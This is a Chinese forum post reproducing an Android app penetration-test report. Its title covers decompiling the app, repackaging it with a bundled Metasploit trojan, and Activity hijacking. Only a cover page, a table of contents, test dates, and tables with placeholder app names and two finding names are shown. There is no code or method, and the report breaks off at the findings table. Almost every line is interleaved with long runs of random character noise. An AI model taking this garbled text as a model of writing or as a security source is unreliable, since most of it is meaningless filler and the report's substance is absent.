找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3864|回复: 0

原创-app客户端渗透测试报告之反编译捆绑msf马二次打包以及active劫持漏洞

[复制链接]
发表于 2022-6-8 20:32:44 | 显示全部楼层 |阅读模式
8 j. l* D2 }3 y6 d, m% q7 b7 v- K( L3 Q( s' G8 k

^; X. Z7 _- x% a / t- X. D N3 Z% B! h" A3 b. i8 u J
* @1 `6 R1 P1 g1 a" Q9 X) i- q/ n% e& Z: R

( b, D" p- c3 N# C2 c- I5 t) H8 A4 a! [; h
3 A U1 D8 o/ H3 d9 q$ ]1 m$ p, ~4 b6 W1 b% t: e

) ]: Q" r0 ~( Q* _ # x5 j- I. t* T4 F& N 文档编号:                ! ~) G5 j, ?( \2 y& O & P. k2 J, v" ^9 C

9 l8 A7 \. [" @, F' {4 n$ b , I8 Y9 {. o; C2 I3 i, `7 F( }- T

- L6 {, h) z# Z! i t9 k- B, }' ^6 `, V/ w0 }   8 i# ^* e) b, G) n y* }9 q4 z& _, H 2 e1 ` d1 X' P1 a- r

& I0 F' J% m, }! ]: g! P 1 i8 C8 N4 j+ s, m1 k

9 N3 g+ I6 D# T( M; p7 m2 x% b4 o2 a) W8 I! m; G) i+ r) R   7 V9 T6 V3 b( C5 r! @# L, R# M9 q$ \) a; O

: b% ]$ b' w$ ~1 S: L ) l% w6 P( S2 C; s0 K4 w; I

7 _; P9 l0 r. i9 f4 Y9 _1 I1 u4 S2 K; R   % { P$ c; b0 K! l2 o% l. |8 F . R8 }. ?/ ?) }* Q2 C) [ |

3 ]& T# \2 b7 e2 s; F 4 h. N6 b3 m `3 z7 J O1 A

* K7 F( A( k7 m5 g0 u3 h6 D 0 G5 c/ Y- ]# V   % I8 Q F6 G: T' N8 F. S + ]1 a% I& I- A& `& K

7 R0 s* u4 A0 c+ v* T ( n8 L+ P: v e' k4 e+ o. t. t3 a

, A ?6 V2 K8 H- T+ I% o" _4 { 2 H5 ]4 P \; Y$ p8 M$ _' g   5 I u/ D+ w- m2 z, p3 M9 \8 E' |* h0 ?

2 R" [$ v& t, V! {7 H9 F' n 1 H% y7 |6 `- _' I9 Q* S4 v4 p

/ { u2 [+ v# Z& p+ m9 t; E* a, H K) s- [* E1 P; S9 b- T; c 某某某APP渗透测试 ' U- c& o) ]+ r ! Q$ P. E6 a5 T2 |; z' h

7 u3 v! ^7 Z( m7 i% v+ R4 s; p / a( n" M% c3 D+ ]

* O* ~# I7 s% k ) q$ U: f7 D% k$ E% p6 l% C   2 z i( D3 b! d( L0 D$ T; s1 A `% F' n+ T: C

: D" I( f! }( f' ^( g( @, _( T! m) y8 W + h" x* \2 t/ Q# h

% f6 }, y5 S0 W! v( Q, E. L; s $ n* w0 c7 ]- z: T# C8 \# p& ?   ' F' O& f, G, b4 ^4 ]) | w4 F7 G7 t& Z1 v0 B

/ D* v; f4 L, S" G' p, P( \0 a2 V4 n 1 |8 N" Q4 H x3 t, Y

0 w4 c/ D' U9 }/ p' {* E; g # G8 v' u6 K; }( w" y   & s; u% |6 [1 ~; K' r * p( r5 f- i' q% O6 |1 W

- j' ?: @4 j f/ U* J + |5 y! T2 a6 L% ?5 L' @3 X

" V0 D$ f# `: [: |+ C/ Z ( M) H6 x7 q" K! j+ F* l   ' V3 \6 g! e; `$ G4 O" }& r# l* a4 W. P4 m5 ~/ C/ K

6 u/ Z! i$ _- i: t: s5 O5 Q + e% k9 `& Z) x- h( c" z

* Y. w1 p; k7 X : d1 F; d% t# \) E& n 技 术 报 告 5 M/ h- L7 o) D7 V0 t7 g $ s5 e5 L2 V' T# E$ F) [/ e

6 `- W# M) Y$ B: x" Q9 y+ h: K 4 c$ j3 e- k8 u8 L$ l

+ k- E; s! s& q4 l9 b0 w: m + w2 |1 p/ S# I, x   * H0 i* z; j; c( N: Z6 ~ ) g; y ]( {7 d" p0 W1 n7 [1 H

0 E+ ]8 s4 J0 v/ l) X7 |" O - O- @) b: a: V1 y% \# d4 r

! t- W5 ~# O& _* Q( _" h8 R ! Q" _# c% g) ]   9 x7 s# T7 `4 p7 p0 S; d* s+ K# b1 M% h

( l7 t& W3 x7 R* w0 s+ O ! v* T2 ?$ [+ l+ W0 s5 j/ x

! N% o% d1 o" S* g) }+ X" H ' x4 g k# k2 X' Y   3 I5 U5 }& z' \, I2 ?# a: s , P! a6 H5 z/ Z

z O0 G3 I6 N5 D) [) u8 u% x# H

, k& {: G5 O: G" h- d # E( p; J" n4 I0 l$ v   2 R4 V: d; d; X4 ~: @ 1 p7 G4 m2 E7 v* \5 Y. b0 m$ q% ~

0 I- s" A) v# |: e . g% J& M( J; F1 H+ J i

) Q$ @, \* O/ y1 D6 u4 @1 P& l# k8 N. j# w ?" L) A   % j4 w& O) g0 w$ a, N1 I8 ~* U 9 s, i& e# Q. h7 u1 o$ k

8 J, `0 S. z& Q/ \ + f- D4 |/ O" N# D( H) o

. d$ L7 n9 K- [; p % Q7 @5 D9 i! }" _0 t B   ' a. s: J2 w1 V4 M' z3 z/ M! Q* ^0 R, ~' o

5 e$ q5 Q( s o " S/ _! o" _( `7 l$ }

/ e1 n7 G* B0 p/ l# D8 ^ $ r* U+ C+ J2 N   1 u* f, O& U& z* Y1 O0 y4 i 2 D4 g4 A( \0 \, _' O2 j! `

[9 w& I8 {( W$ [, y 9 X3 q+ P( K- I$ w* g* {. D* ^

( ~: V) |$ w/ Y( N 4 C7 S8 G' L1 d4 P/ }! ]   * i; n7 _ @1 I1 `, p 0 F' u- u8 C* P6 z2 Y4 E

: P# `0 L7 s# n. A+ I c, ~ ; j8 Y8 H% X# {$ i M

- \3 L. C* m; j: v5 v4 b' X 3 U; a' J7 S8 n/ |! I% r* ^ I   6 v4 V$ c3 m: u: y' d u! _ ( p( t0 s- l5 g- Y4 x; H

7 e% S7 s8 K/ P' n3 H c9 p 5 H) q- n+ \. ^ y* B

! Z( J+ O: G9 z4 N2 J8 J1 N" t; y0 [6 @: D& R   4 f2 w$ N! c* E$ @% Q ?5 y 7 p n) S# r+ y# k$ P9 H! e' F+ i% i1 W

0 W& w5 Y1 Y7 w & Q* d s" e a2 k6 H$ F( i

, I4 d2 o p1 n' f& L 3 w- ~* X9 J4 u   : x- D K; _# _% h6 {7 l; F1 @1 {! j- M

% g9 b. n2 t2 X6 t0 Q . q# C! C, A9 K8 ?

; E3 Y( J4 h4 n/ V$ u2 I 8 K2 G/ m- U9 R* @' _0 y   w$ x" V H8 @* B3 T+ O9 ?4 Y 4 p" ~) F, M9 p: f& v% V

* D K0 |: T; R. t - P! X, s5 \3 y. u1 a/ ?

! n; U4 B$ d8 n! e r: X3 ~/ |4 j& G Z2 ?8 M/ k6 C5 ]   ! l: a, p2 Y, d& T( U0 `8 O ! ]+ X; N: j1 p9 {! W$ l

3 Y g. ^& t' H ! u3 O: [3 R! @- `

2 b. D( {8 C, W9 M7 l ?4 g7 R6 R* ]2 x7 @7 b   : @: {) ~, M) C0 b 0 h/ j+ Y* L: h H2 n" F

1 P* v/ m6 D: r& A/ F 5 U1 D1 O- s, W+ g+ C

5 @5 X" z5 _; f0 R j/ u 2 B5 M5 r4 a3 F   3 A# o1 p: Q5 \" Z0 G 7 o9 k7 [ q( x5 q# i

; J1 o3 v- i. ?2 W 4 |9 E" B/ j* B& ^/ n9 D

' j6 Q% E4 l+ G1 F$ G# F 1 `" S$ k) p3 m" X: _0 a% ]1 S   3 Z3 g2 q4 |/ e ; A, r/ A( q: Y4 |; ^& Q5 l

+ a$ S8 c+ U. _ F4 E: n% e! N $ u4 g7 q# \1 t0 U" o

/ Q }; I5 @( p1 P d0 v6 c$ I# L9 O; U k   ! l9 W$ g/ _& `3 H " R2 h7 u& j9 w0 Q

! F: b( I! N+ z( U) j' a$ V8 U8 r

% f8 o$ u# i- F% h6 G- C % T. L' x# M2 {   6 ^2 }9 m: P! l6 _, \7 l5 L 3 r" O a5 b2 m2 D9 J& |5 u& K

$ `4 V) Z g) l$ e$ ~# U, g& X5 N; G2 L' Z% J+ w, r" J

& \. s6 r! P; O2 V1 y- U, j7 S- }7 T' j9 `- j! q 二〇二〇年 ! c) U# {2 I+ Q5 e- P2 H+ J$ B 7 Q, b6 Z) f( n5 I$ T& r

5 x" {2 t4 p, L! X0 M- }; F( @ g6 w8 y0 X) p# I1 _
2 j' x: X u6 \9 @/ Z. E6 c( ^: N; d: L: ~! r! d. g
: d8 r- H( ?. J' G8 j( k ' a; p4 ]$ X1 W4 S2 B& C X8 b
- T4 y) q! a7 R- X* Z Z* {( F 5 L0 h- f* r# W% j; n8 g2 l+ j( c
# E- o/ {: x) ?, k* B6 h( c; E' \ 0 ]# p& i' r9 W/ C0 u/ d
% O1 y4 Q4 \3 e. Y$ o- [/ a ( [ I/ Y+ E" S: V2 s6 h! ~4 R9 W
/ q7 K$ o# R! J0 q7 l $ F( H6 D9 o6 y% m. t$ S
: l. H) R T; I0 m' L3 ? ; [; K- u( z) Z. c6 ~6 Q
; c, C( S1 F% ^! \2 t # R& b; |& \8 Y4 [7 b: p

+ Y9 V4 k! Q- D$ g( C: b 3 b) Y' R$ d! ~; ?8 [0 \$ K 目 录 5 ~. h9 L- J+ a! o/ c( m$ j * h2 D7 f1 g$ ~

: i* D6 Y' o& p5 V5 v ) c( G. a; u4 z" w" i 8 S8 G2 _8 s- V+ e* k" ^: {# a0 [: `' b @* P+ [4 r

1 P7 D6 D( O. P1 d3 V 9 e: g$ m& z* ~. |   : b/ o* [- Z$ }9 z5 X 5 l$ Q/ I4 L0 Z# e' y

1 R3 |1 q+ q/ @3 |9 |& |9 C) k. _3 P& ~) d, w

% d# W$ t* L3 x ^/ @: T) _0 {/ r% F* u9 b$ H 1 概述... 3 " N5 f O3 m7 A" M5 x- J/ B, n' v * J+ }6 d$ J/ W* `5 m

6 q) \3 j( {' d- F# n; _8 L1 \5 A3 @1 f# R% f; y0 k, I. o m! ~

2 e! c1 E- J! X " J) c9 R5 q0 z6 w# E7 V 1.2测试时间... 3 7 x0 w0 }; ~( ^9 p- B# V: `/ u G% c3 M( p6 b. i, v2 Y0 H5 e- a

" T6 f! J0 t1 J) s3 `% N $ r1 J' E4 y: r! D: i; e$ v" U/ @9 E

+ D4 y, w, {& H9 v+ ]4 P ( a3 h" N2 m0 H( x3 T1 [2 Q 1.3测试对象... 3 8 u, I. k% B/ R# M, a# [8 x+ a0 F ; q1 C, b/ u+ k0 j7 C5 y9 k% `* p

! u4 |& q" [3 W! k ' ?0 M+ x6 i" p% t( o4 d, F6 Q/ Q

8 z0 F9 Q* Q: d0 G; w6 T+ W + ^! y# `# {# A8 B! t: r 1.4测试结果... 3 : n( V$ d2 d3 c5 e! n; A6 h# ~/ G a1 Z% S

/ _/ q# \7 C9 ]+ y. U9 I( a' I. m" V s7 r5 a" l

" O& A6 A0 ~5 k9 W2 a ' z2 y8 l$ s& Y' G. G* u+ x6 N8 v 2 检测结果... 4 $ I) \3 ^' [7 q 0 \- Q9 `9 a5 w3 Y

' J: n/ J5 R! G( W6 m ( }+ D7 p8 V. T6 J7 v/ w+ ^* d

0 _% f5 u4 s2 H' n/ w2 @) E+ N. j9 j7 t7 k1 y7 _# e! \, M" O- K 2.1 某某某... 4 {% e/ Q$ f5 U5 H* ?* J. @ % L+ y1 z1 W1 ^5 w9 J& [

" m+ a, c* s, o: I4 h+ w* d: C 9 r* w7 I% b: o1 s8 R3 }

, k) U0 \, \# |- ~4 \9 ~. g* k% _* v- b0 H1 `9 r 2.1.1检测目标... 4 ) w" N# |$ c7 L/ T0 e: p ! p# W8 p$ w6 A6 ?' H8 j z

- O( w3 a& W7 Q- h H; T/ u$ k( ]6 M+ f9 {3 C2 }

7 G8 k3 Q" g6 i$ G3 c% F, V ' R& G3 o/ g* S e8 `- H. `! u8 p 2.1.2检测结果... 4 * p, r; o. @2 f- Z& C; J& T+ N , x- m+ V) w0 o3 y* L0 {

! n9 d% ~9 n, A; W( H' G4 p/ M8 Q" x + f( x! ]+ ~4 j4 Z# _) P7 }5 P8 G

/ s. T5 O z8 U8 e8 M' { 8 s$ F* S# t- [+ P. X 2.1.2.1. 4 & M: ]- Q' b6 K) j& m ) g8 D2 o4 i# e; v4 J

/ u% S4 b1 T, X* x 8 ^/ Z0 `' H9 r" l! f

$ n8 Y v! ^/ E& p, l6 T$ ^ 2 n) }" t: |1 C" z4 A, Y! k' l; k5 f 2.1.2.2. 6 0 U& u Z& O9 K3 F) i \8 u + L5 y5 f& _; [5 V+ _. D

# ~+ E- |# V/ q- Q) V: ^9 m8 c ! M+ Q0 M8 c3 k; d4 e) k

7 ?1 A% r" N [: @5 q, X , q: o. F" f8 A S) c$ [; Y 0 N( P$ s$ V8 r" N 5 u4 o$ [: a* p

; k5 W! O! C2 |, E1 K) M e 8 R8 E1 c7 `! q n' N
R' i" @% }3 n6 h' j1 A ' G) g( ]( ]' z
: Z" s+ Y. l5 p8 B& x* f$ Q+ w' ~ 0 ~; g# f4 I* j8 E
p o5 J7 q! W% W- \3 A" y" n* m9 X! s7 G5 ^
" J% ^1 g5 }4 x- U4 Y) w# Q/ x2 \$ |) C: {

; P9 K* y$ ]0 `3 L8 d, |" B& R5 U: B8 ?7 q) T 1 概述 * i) C- f: U. i' k" h# S/ W& _ 8 A8 T: b# | B+ g/ _% J u. `

. y% Q# u8 h& I. h F + c# g2 b7 l1 w' \' P7 n

C. M: R; l3 s- E& E - d @, s4 X N4 m; ] 1.2测试时间 0 h6 `. S% e# ]3 x 0 @9 |* g1 |! s: L$ U5 E) P& q

$ z4 U6 h5 g1 F* Q I$ k, A' ^ " f3 [- d* X8 s1 q$ I2 L 3 y2 D9 @$ A% U: r/ g% S- r" T/ G+ n- J3 c) P8 v" x0 f. B7 _9 `7 \+ y8 p6 I5 \2 z$ @5 V/ {/ j8 K* r' m$ |! h! v" F" @% h7 _8 x! x( g" X0 r7 p/ b0 d6 {8 w1 ?3 M4 N, M& |6 S! Q$ k* B, m2 F5 _8 M E8 ^7 z. `; e' J6 S4 S) j& g# i# u' m7 a5 ?9 K+ p' A2 W$ T( K, ^6 C! W4 P) O W9 s( ~0 Y3 u F8 K& ^! N% n* l& O/ `7 ^8 r9 r+ ~! w, d; |# ?$ h S# l/ R; }: f6 M4 a/ t7 [9 X( C9 L6 S1 n7 x( s2 {% M; h. F. R- \# _7 h+ P- Q- y. d! M+ d& D1 D/ D F3 T/ _7 y8 S$ Y4 f# Z j5 M4 i4 f& K6 ~$ X3 _9 A& H% Q. u- L$ ~; {% ~% `. @5 A: D- F2 Q+ J( W# E# S& ]. b" w4 c p- ?& S) A# S8 e+ K2 x& Z8 _8 y2 z: ]1 x1 U/ k J+ d {4 T4 I# p+ I2 Y' C- C& l# u5 _3 C P
: {$ l, g2 Q- ]& p. m& @' r# Q * U1 p" A& F+ i8 K K

6 i9 q- L" U5 `4 j2 y" d2 f6 j' D2 D0 I, \ 渗透测试时间 / o! V, @6 D- J* w1 \ 3 p: k) k k# U3 W

, w/ f& w/ Q, U! w7 r # z# S7 h; S# q
4 z2 t/ `# U$ m5 u5 u) f8 f r, M/ B# D/ ^- {% p

- A4 d- m) S9 T3 ~; e9 f 2 {* s$ W, J: T9 A$ \6 }( d 起始时间 ) a4 c, v- w% J" R, p ( f. m) y2 T! V$ X

" a4 E9 [/ Z( H$ \ 6 H# Q6 e6 X s" z
5 r7 X" o) c0 R# {: i% v/ `! L+ _' F ) s# M8 j, p2 x0 s

# S' G9 J$ Z1 b+ D) `- n8 w& `* v/ D; W n5 ?7 w 202046 6 T5 d/ t/ n- d) E : y6 A0 q( ?. \# g

( V+ D- ]/ \# L5 u t/ }. R# J8 S6 ^
' L0 V+ J y, d6 @ % P' Y, R8 D' @! x: Q

3 i1 X Z8 ~) G+ R5 I/ m; q* h / c' y1 L1 S: d0 i, V! {$ @ 结束时间 # f( b* B) \/ L ' F! p u# ^0 B& o F4 \0 ]

" u" d; i7 X, J$ g) ?. @, Q/ E( J% L4 N; W: y/ c1 s$ B
; B- A0 w9 {: o/ p9 j1 Y9 O, ~, ^: D5 X' {+ w) x

0 E& V- u' B/ W/ b, Y/ J$ ]0 X9 d* }* e4 j& N 202049 1 l3 k7 i4 O. N1 ]1 z0 H ! P* m: q% k7 I7 Y9 l

, U# p3 z$ w5 L4 Z, N7 Q2 L- I " u& k; S" j% n4 E5 D/ a; d
$ A; z& l( Z! j " m( F, k) K' p& \' e- T) h! r

' C R8 Z/ h0 j: F' c1 o 5 ?6 G, X. o% v" J6 S) R: p 1.3测试对象 9 U, |( o/ O4 Y6 c* i) K8 W, G + {8 R9 W& _/ V5 n7 ]/ O

# L: C& [" s& O . t( R' K- p4 z% \* z

" |! S% s) k( m$ v1 u% B6 I8 D - N" t: {# r: Q0 i) D8 R6 ~' E5 _ 此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示: % u7 X4 t9 p% B$ s2 \ 5 _3 u' ?* z* x# Y+ {3 A% j

7 i8 j. D& H9 ?0 f1 B. k' Y1 I: l ; d3 Z! D% e0 q& m3 ]! n

6 T% R( C7 X+ P; N/ S" x# j1 J4 Q 1-1 检测对象 + P& E0 P7 s5 k 1 S3 o& P6 G- f9 ^& Q4 x/ S* p

$ y0 `& j/ h! v' C! p' { ) T. p2 n- Q$ @5 H8 P ( X9 R7 v9 {4 [5 \' \) P- l% [/ r/ A# }9 ~" P( |9 `- |2 y" I4 M" v& q7 b- M! `7 u" s; v) u+ _( p } _& S* F5 J4 s/ Y/ s; v3 j9 k8 k: u! ?! U8 \# s- w7 ^4 K/ v- K7 j- i; T& p3 H! x' n! q" O1 W5 F) i+ ?0 X3 ?( k% f/ Q2 F; X" S/ P) p. O/ ]. A" _- i6 F% x0 q( t2 p! Z1 U% o; s" v( k4 u8 X, S3 \% \& s: C+ ?3 x" }9 w5 Y! L) U+ C% `6 }' @0 @2 _- f) n1 @' t" D1 S. A0 p/ `/ s2 H4 N1 h% y6 z) t# l5 ?& I$ O& F" S. S" g3 y$ f8 [( m8 {6 K! v' t4 a8 `/ u' R) X/ d) |3 E4 @/ d8 N8 i+ U) z1 v; x/ o! R0 L' l5 u* I, b* Z7 P; @* Q( G/ ^7 q* A l6 x- V+ h" w4 w+ o! u& t: M8 v. |) t1 _( y: \3 p4 U* c9 l+ c S+ R- _2 v9 ^; I5 |( N5 F& {/ g- c( `; K2 n- _* S2 [/ u0 i( H9 ^+ F% S! d! p* u
; _8 }6 Y# m9 v. {1 B( ?6 [2 ~( g% ]5 \- y& X0 V3 i! o" G

$ n; C$ Z( ?( w ' d F4 Q3 e& q 序号 9 {& M6 Z6 t. D5 X" V; o3 | ; p) i( L" |$ H" r/ d

& U: t- Q) o0 j) n; ~# W " W, V n1 f- y6 w) ~
# g- _8 {3 C" A9 E 7 P3 \0 f0 D) B& |

3 o9 P# d1 A% S) l3 }3 l7 l7 m( h( |9 M6 f5 D' m 测试对象 ' s2 J" _3 L: Q% g {5 S : n0 ~% k' Y0 u [4 _

6 a# Y2 @. i6 p8 s- ]: r* ^# `% o . ?+ E+ F3 k0 s. C# `0 {" a8 P
) l1 l# p. m- A& t% |" f7 _ 8 k1 ]% Y# o3 \/ E D/ r( d

" ^# q, M5 X' @) I5 @( A' W: T% t8 |0 J' N5 v 测试地址 1 l% b4 W% e# ?7 u! E. d6 A$ D! @ Y. N9 g) L' O$ X

# w7 G$ v/ n* G2 ]) ?8 U' T # @) y q: t" l( s5 }5 [7 ~
! U1 }' `: G5 _" I; L 6 V; u, W! @/ X

, T0 C8 A5 l/ _$ K" s; S9 \/ r8 n& p: c : u" a. e+ M: A9 a; g1 @# Z( Q* c 安全漏洞 ! G8 b( _- F/ e; |9 w. D6 ~/ p % T9 g6 _$ Q* [. w* c8 G

1 `0 R# V7 G/ {5 n9 h1 M. u 6 @# S1 v8 W# R. r. |0 \) B
$ V8 m% P' N9 c4 W/ \: h [% ?% H6 d

4 |2 t2 o. v' X+ Q# G ! L0 f: j9 ]$ w: C. f- N0 W 1 ; o9 l+ y4 I5 J4 t/ b 4 W1 d& q' \: Z/ I+ h

& {7 @/ T& z& f * @2 n. _" {2 q, p3 B* F4 d& B
) p9 h7 K- |2 j! D) [( Q- f' u$ R, E % H6 M$ ]: A! c2 @, z s# S

0 N; v* w n! ~" Z4 Q5 S ' U- C0 q, R0 j 某某某安卓APP + u: f, g! Q2 M5 ?2 e" K4 E ' q4 E0 P% M( c0 u3 S

. [$ h* l1 W! Y S1 n. p/ V ( z! ~) f% `. [
( f0 V0 a7 b8 B, C # Q5 ^. m- ^* ~. ^- [7 C: _5 N7 ~

; }9 Y: |+ N; w2 ^ 0 L4 n6 o6 [# n9 a$ G   5 j$ `% Z4 l H# G3 `; d& Z . r/ \7 d l) N

5 S- H# J+ X+ a 8 I6 H" m2 ~8 h
' Y7 W4 O- R! B2 |8 E ' k" x0 `! f9 p: G

7 ~0 E2 `6 `* U1 P! b: F1 S4 J% C3 `% m+ i3 ~; q 2 / z: q; _4 Y8 C8 W' t: I' | w, q ) C+ D# b' ]: J8 P( e* ~

. M# b( n6 M1 m! |2 G0 v! ` ' `2 x8 S+ m6 J
0 w' P+ d( G' v1 C1 u0 T 9 N+ o8 ^+ E- n& s; T: }9 N& A

: @- K# X. F# H7 @' d4 a( J* i8 m; A, L5 v# Q+ h1 K% C 1.4测试结果 ; I4 ?: c% Z" p) p 4 ?* y4 E" l* x! ?: p* G

, @" M( j# h; P+ N& c& g% B! h8 f( o6 K j, O0 M ^% ~- k7 I7 L

9 |3 ^, L4 e# Z+ r* b6 t/ X- ^' ^8 `# H9 @/ k z4 i7 p, v. n0 \ 在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示: 4 G& V) x4 P& I# C' N4 p , B a, H3 R1 g" S8 ~

9 A, w$ i- \+ o. ^$ F+ M& \ 3 Z" j# T2 W& s

C, ?4 `( y. ^" k( z4 M 7 Z+ W' J; n! C h& M   1 q1 N. b6 \& I! a ( e, @% v, _5 l9 }4 p

! I& U, j4 e1 O" d9 a # G$ S( X% @4 n+ ^
7 [6 n8 g3 R5 _* Y 4 k5 @! h# A+ w( q6 `. l & Z9 C) d, }+ O2 w7 A0 U* @! P7 E1 O0 A+ W n' x7 s8 ~2 J, W- V( d& Y' M) r2 h. D6 c/ k+ e Z4 j' p8 K& U8 i& i1 Z4 J. ~3 W3 R0 O! H: o) s: Z- M' |/ e% \8 j6 u/ I( q* o5 T' p9 Z% t, E4 J1 ^4 q/ b* p! t, g% c2 l& N: b( ^9 k% z) @7 H m3 t6 ]; U! Y; k6 Z, P: E* ?5 r/ ]# {9 b) A1 {# G. C9 }4 |* l% C7 ]/ T% b e3 @& E- ^1 J# V/ [" e+ K( t5 J" U" }% ]* @! Q) K& h7 c* |9 m Q8 P: z! A+ I' `* o, p' {# O' V9 ]# Z( H( c% [3 m8 y1 z1 o8 V. {7 f5 [4 N' i' X0 X B, u6 a1 ]1 k1 E* p6 ^; P, d! f4 w* e! _& j$ N$ X$ W, `: Z ?6 `+ Y" P% t1 O8 C% M& A, e* d2 t/ i0 s+ Z Y( B& W; X1 s$ q3 f1 x3 x) }, H# ^: Q. m. L3 t" M6 s& W# {& E% ?: C7 H) p1 d3 V' d. h* \+ ^( W' Z0 o5 x, N V; J. j! A% z% k0 y+ ~! q& ?4 {# u( O7 R/ l0 E a( a9 D K8 g3 k2 d+ F2 V5 I2 B' |6 q3 \0 V* @, U2 L, ?6 F F0 r; A, [: M4 ]6 z ^+ \! @$ ?$ x. p& Z' L+ D, i! w' j% a! G4 u" D0 ?) t0 a' l1 H* I+ ^9 Q0 |. ~* t! G& D4 n+ p. S3 ?( z; [7 n$ u+ s( q' l! r- m1 R. M9 y' X I) d. U8 ^8 C6 s; s% {9 S3 T) N e7 O3 y% S' j; J" j0 G" \( l c! [, ~2 f; S# _% T8 f7 n9 q( i; X+ A8 m( [8 L- A* v$ h+ R5 [. w. k5 \5 M/ O# j$ e: ]9 Q7 S+ d9 E ~) L5 ?4 Q) [" y2 Q9 Y( k9 ~* ]6 K: k$ i' `8 {/ p, I" o. d' a1 g. J7 ]4 F0 ^
- [7 G; q! Q) \2 F* f/ A* o6 l0 @' X2 E

. `: Y! _9 }# j W( `: M , B! m A7 n9 N( X( f3 c 序号 3 J- _0 G" \6 m% _7 }) J0 v; L6 {# C+ r0 } l, k: D

) C/ H& E9 p! Y3 \( T" @& G $ ]* ?- l& b- E
2 f" ]- }2 y, s2 r' [. \6 t 2 f+ _" D' q1 P2 M; q) o \2 g

S1 h4 a" I2 F7 x, k/ c ) R# l( G( n) d9 l/ `& k+ \ 系统名称 , }6 p: l3 x& `. p6 h9 i0 l+ o! }% v : m9 u2 z$ T" o" K7 s: v

7 {. M+ k6 x/ K- e w& C . _+ J0 j, Z/ `; V
8 T+ v+ D, Q& r! y5 z% X - S! p6 _1 z9 N4 ^( ]

) i ]* d0 F1 @+ R9 E/ v . }0 Q) t3 r4 g# g: K4 T7 o 漏洞名称 * @ `/ ]2 I2 {- K0 _0 Z+ C % T6 O, Y# S) N! [- o3 u7 V

; k0 X& w: j# c! T8 G& J4 }5 Q9 l" M8 I) d
4 F* s- s8 n$ Q& G0 k! U: |& m( F) j/ k6 ~# q( S

" h# [2 w \6 i ' f- P' }% G; ^& j% B 漏洞危害 1 t) I: J3 C h: v( i( p$ o9 i- H& r0 n8 U: q& f+ q; `

2 e; B( `# H* L & l+ ^. k( v7 X- }! \
6 e `- f; h$ l; b. |/ [ ( w. C1 D0 Q# g- G/ K! T' s. @* E

2 t* ~+ l% M6 }7 J8 \ " ~3 v, @' P# \% Y* `9 t 修复结果 8 W. V! o% i) e" J S6 z# b( i& h# m, x2 S3 G: @( _7 o

" a5 ?" M1 y3 Q8 O' [9 K- z. q+ t D2 S& g- L
3 Y0 H8 ~9 J! v , _9 [9 r" ~. f* [1 c M/ H7 K

: D0 x( G* u8 X 1 ~1 N4 p0 ?4 N 1 6 a/ m+ l# f& W% M9 G - E# D! ~6 x# `8 p& ]9 A* _) m

- N1 ]( I% u+ I5 u6 i) H! Q, I1 u : J6 E$ a- s! V; X
: q" p7 t. j' z1 ?% @4 J 2 v/ K. ?$ p# d, J: }, A

" ^6 r8 X# n' l) X2 J 6 Y7 u2 r$ |( g( a4 _$ O. n 某某某某某某APP + {; }% L3 m# f0 g! I 0 S9 c3 m+ J, i: Q' v; a0 v+ y

# Q) G4 V8 C( c3 w! U" x( y 4 f( O9 }$ I7 J) O/ u! D# b
+ b4 Z, a; ~! f3 P4 Z" \/ E# A6 X2 i) W5 i3 V

7 B8 r0 Q& h0 A* w( C3 L; f* E/ o( U% h; x/ D- S/ t) q Activity 劫持 ( T- x) U/ k- l 9 q$ t# i7 n8 r" K. E5 W

2 b' P U; R3 ?# S( N/ b! {0 L- H S" |; C$ F+ X L; E

! l) z# B7 B: @) j- V 8 j- t$ ^) K! q" e/ Z   - {- H6 N; i& @+ i. ]5 I 9 e& V$ O/ {& ^; C: ~

1 k# b* |3 j7 X6 b 8 \/ d" k/ k: T# E4 b
6 a5 _2 A8 x' C! p4 k! d 2 Y. ?- }; v" z- i& f; p" C6 R

# b2 W7 y2 j8 R, w2 H0 W* N # O W, Q# L; [4 \! r2 l9 @ + w: z4 O; [/ T8 | V3 w; g: M# D" N; d& T( O# c/ f- g" ^% c

+ n" C% W9 X8 O! X$ d/ o. \4 W1 S& r( B1 d# q6 w, h+ f
" f2 }8 x+ {6 m' U 5 K5 m6 \% ~* u$ B; G$ F) |

* n, H5 s8 M6 G4 L: o- P, U 0 u) D0 n1 M4 O, A, z2 P   ; ~: E; p! [- `- m% k L# o: u7 e2 {' ]: p

) ]' T1 q( \/ M. M4 d 1 b. w& _, }; f% M% X
2 s6 v- g6 V# ?" E + o. h$ b# F; ?# ]3 U3 b- m# f

0 L3 x/ q6 Z# U) a' c$ X9 ?2 ` . O2 {. j! ~! u( v# w& V: h 2 @4 S1 c! z8 `& E. ?5 ]: |9 {8 F% Y. f$ _

5 g' M( u4 c5 T # j( ^/ e( f0 `: ^7 ]& P
1 ]3 I- n8 r- \3 E 7 g0 Q: Q% w! j: F$ l& T

5 p- I R. d4 @" _- }* o 3 C8 {) ~7 e7 ] 某某某某某某APP ( I4 O! }; v, g0 `. |2 X) N3 R! ] # m9 I6 [. \. J' Q3 u/ N

9 B+ S4 H, M! d: q , ]; Z7 ~7 k/ m* R& i x/ T
u3 ^# z$ p4 Y, k % K: N$ K7 G8 ^( | c- i

0 ~/ t& m2 r. [# J) p0 v$ @/ } ; L- E% L4 I* q3 w 反编译二次打包捆绑木马、篡改APP代码 3 {8 q- u" q+ e. y 0 Q$ c @1 i/ P& H( G x. N% J

( V* J1 o, F2 h: m2 X2 `' ]0 P0 H5 t( L& `; {
% N) X# k9 \3 u4 A" m7 ` ; |4 I$ Y. p0 I: V

+ p( @/ P& X+ f$ }+ U) u 5 f' K4 k6 H- G9 K& c# ~; A4 x2 [ 7 e: q( z( U6 r8 G& i( c1 ?4 j- B5 T4 P : Y6 b8 K$ K) k0 h

2 c5 c! V, t4 A% R 9 Q* k' _2 |& L! v ^/ s7 O
- R8 C5 b4 L0 v' d - i* v9 C. L% k% P4 X6 v

, }' W. D. e: A5 R1 s3 F 6 J2 i% Z6 O$ ]9 u   3 c, Z6 w3 b( [6 |/ d3 S( p: A: ~! V, w0 ]4 n* V; D* f

) D3 j* v; T& {8 Q& T4 n/ O# _" {- ^! ]* j+ u
) j9 i( w N* a! z( K% k 9 k. \3 M1 E/ ?% ^1 F
* v3 [2 q+ L- `3 b) ]. ?7 l0 c& P2 K5 \! l2 C* f

